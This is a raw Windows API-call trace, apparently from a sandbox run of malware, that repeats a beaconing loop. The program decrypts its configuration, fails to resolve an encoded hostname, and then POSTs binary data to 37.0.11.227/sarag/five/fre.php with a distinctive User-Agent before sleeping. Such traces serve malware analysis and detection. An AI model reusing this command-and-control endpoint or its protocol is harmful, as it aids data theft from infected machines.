[0206.839] GetProcessHeap () returned 0x690000 [0206.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0206.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.840] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0206.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.842] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0206.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.843] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0206.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0206.845] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0206.845] GetProcessHeap () returned 0x690000 [0206.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0206.846] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0206.846] GetProcessHeap () returned 0x690000 [0206.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0206.846] GetProcessHeap () returned 0x690000 [0206.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0206.847] GetProcessHeap () returned 0x690000 [0206.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0206.847] GetProcessHeap () returned 0x690000 [0206.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0206.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.848] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.066] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0207.076] GetProcessHeap () returned 0x690000 [0207.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0207.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.077] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0207.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.078] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.303] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.303] GetProcessHeap () returned 0x690000 [0207.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0207.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.309] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0207.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.310] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0207.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.311] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0207.311] GetProcessHeap () returned 0x690000 [0207.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0207.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.313] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0207.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.314] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0207.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.317] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0207.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.318] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0207.318] GetProcessHeap () returned 0x690000 [0207.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0207.318] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0207.318] GetProcessHeap () returned 0x690000 [0207.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0207.319] socket (af=2, type=1, protocol=6) returned 0x210 [0207.319] connect (s=0x210, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0207.346] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0207.346] GetProcessHeap () returned 0x690000 [0207.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0207.346] GetProcessHeap () returned 0x690000 [0207.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0207.347] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0207.350] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0207.350] GetProcessHeap () returned 0x690000 [0207.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0207.350] GetProcessHeap () returned 0x690000 [0207.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0207.351] GetProcessHeap () returned 0x690000 [0207.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0207.351] GetProcessHeap () returned 0x690000 [0207.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0207.351] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0207.352] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0207.352] GetProcessHeap () returned 0x690000 [0207.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0207.352] GetProcessHeap () returned 0x690000 [0207.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0207.353] send (s=0x210, buf=0x6ab500*, len=242, flags=0) returned 242 [0207.353] send (s=0x210, buf=0x6aba40*, len=159, flags=0) returned 159 [0207.353] GetProcessHeap () returned 0x690000 [0207.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0207.354] recv (in: s=0x210, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0207.465] GetProcessHeap () returned 0x690000 [0207.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0207.466] GetProcessHeap () returned 0x690000 [0207.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0207.466] GetProcessHeap () returned 0x690000 [0207.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0207.467] GetProcessHeap () returned 0x690000 [0207.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0207.467] closesocket (s=0x210) returned 0 [0207.468] GetProcessHeap () returned 0x690000 [0207.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0207.468] GetProcessHeap () returned 0x690000 [0207.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0207.469] GetProcessHeap () returned 0x690000 [0207.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0207.469] GetProcessHeap () returned 0x690000 [0207.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0207.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x684) returned 0x210 [0207.507] Sleep (dwMilliseconds=0xea60) [0207.512] GetProcessHeap () returned 0x690000 [0207.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0207.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.549] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0207.554] GetProcessHeap () returned 0x690000 [0207.554] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0207.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.555] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0207.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.556] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.557] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.557] GetProcessHeap () returned 0x690000 [0207.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0207.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.565] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0207.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.566] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0207.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.567] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0207.567] GetProcessHeap () returned 0x690000 [0207.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0207.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.568] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0207.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.569] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0207.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.569] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0207.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.572] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0207.572] GetProcessHeap () returned 0x690000 [0207.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0207.572] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0207.573] GetProcessHeap () returned 0x690000 [0207.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0207.573] GetProcessHeap () returned 0x690000 [0207.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0207.573] GetProcessHeap () returned 0x690000 [0207.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0207.573] GetProcessHeap () returned 0x690000 [0207.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0207.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.574] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.579] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0207.584] GetProcessHeap () returned 0x690000 [0207.584] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0207.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.585] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0207.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.585] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.586] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.586] GetProcessHeap () returned 0x690000 [0207.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0207.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.588] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0207.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.589] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0207.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.590] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0207.590] GetProcessHeap () returned 0x690000 [0207.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0207.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.591] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0207.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.593] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0207.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.594] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0207.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.595] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0207.595] GetProcessHeap () returned 0x690000 [0207.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0207.595] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0207.595] GetProcessHeap () returned 0x690000 [0207.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0207.595] socket (af=2, type=1, protocol=6) returned 0x240 [0207.596] connect (s=0x240, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0207.618] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0207.618] GetProcessHeap () returned 0x690000 [0207.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0207.618] GetProcessHeap () returned 0x690000 [0207.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0207.619] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0207.620] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0207.620] GetProcessHeap () returned 0x690000 [0207.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0207.620] GetProcessHeap () returned 0x690000 [0207.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0207.621] GetProcessHeap () returned 0x690000 [0207.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0207.621] GetProcessHeap () returned 0x690000 [0207.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0207.621] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0207.622] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0207.622] GetProcessHeap () returned 0x690000 [0207.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0207.622] GetProcessHeap () returned 0x690000 [0207.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0207.622] send (s=0x240, buf=0x6ab500*, len=242, flags=0) returned 242 [0207.623] send (s=0x240, buf=0x6aba40*, len=159, flags=0) returned 159 [0207.623] GetProcessHeap () returned 0x690000 [0207.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0207.623] recv (in: s=0x240, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0207.709] GetProcessHeap () returned 0x690000 [0207.709] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0207.710] GetProcessHeap () returned 0x690000 [0207.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0207.710] GetProcessHeap () returned 0x690000 [0207.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0207.711] GetProcessHeap () returned 0x690000 [0207.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0207.711] closesocket (s=0x240) returned 0 [0207.712] GetProcessHeap () returned 0x690000 [0207.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0207.712] GetProcessHeap () returned 0x690000 [0207.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0207.712] GetProcessHeap () returned 0x690000 [0207.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0207.712] GetProcessHeap () returned 0x690000 [0207.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0207.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x320) returned 0x240 [0207.728] Sleep (dwMilliseconds=0xea60) [0207.729] GetProcessHeap () returned 0x690000 [0207.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0207.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.730] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.738] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0207.748] GetProcessHeap () returned 0x690000 [0207.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0207.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.749] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0207.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.752] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.753] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.753] GetProcessHeap () returned 0x690000 [0207.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0207.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.754] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0207.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.755] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0207.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.756] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0207.756] GetProcessHeap () returned 0x690000 [0207.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0207.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.758] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0207.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.759] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0207.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.759] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0207.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.760] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0207.760] GetProcessHeap () returned 0x690000 